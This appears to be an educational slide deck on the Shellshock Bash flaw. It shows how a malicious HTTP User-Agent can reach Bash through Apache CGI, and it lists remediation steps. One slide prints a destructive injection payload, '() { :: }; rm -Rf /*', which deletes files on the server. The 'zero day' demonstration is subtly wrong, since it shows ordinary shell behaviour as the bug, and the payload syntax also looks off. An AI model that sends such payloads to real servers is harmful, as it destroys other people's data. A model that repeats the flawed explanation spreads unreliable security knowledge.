

ShellShock

Zero Day Exploit for Bash

Bash Functions

```
> foo() { echo bar; }
```

```
> foo
```

```
bar
```

Inside Bash...

Bash's environment variables:

KEY = foo

VALUE = () { echo bar; }

The Zero Day

```
> foo() { echo bar; }; echo Hello World
```

```
Hello World
```

```
>
```

What Happened?

When bash went to store the newly declared function in its environment variables, it accidentally executed some code that came after the declaration. The parser goofed.

Who Cares?

Normally, we don't care. The problem is some applications leverage bash to do useful things.

Can you think of an
example?

Apache

Apache uses bash to process CGI scripts. For convenience, Apache stores information like the client's user agent as environment variables.

If we change our user agent...

This...

HTTP_USER_AGENT = *Mozilla/5.0 (X11;
Ubuntu; Linux i686; rv:23.0) Gecko/20100101
Firefox/23.0*

Becomes...

```
HTTP_USER_AGENT = () { :: }; rm -Rf /*
```

Anything which Apache's user
has permission to delete is now
gone.

Remediation

- Give web server minimal permissions (read-only)
- Patch bash (above 4.3)
- Patch all web service software
- Be on the lookout for reports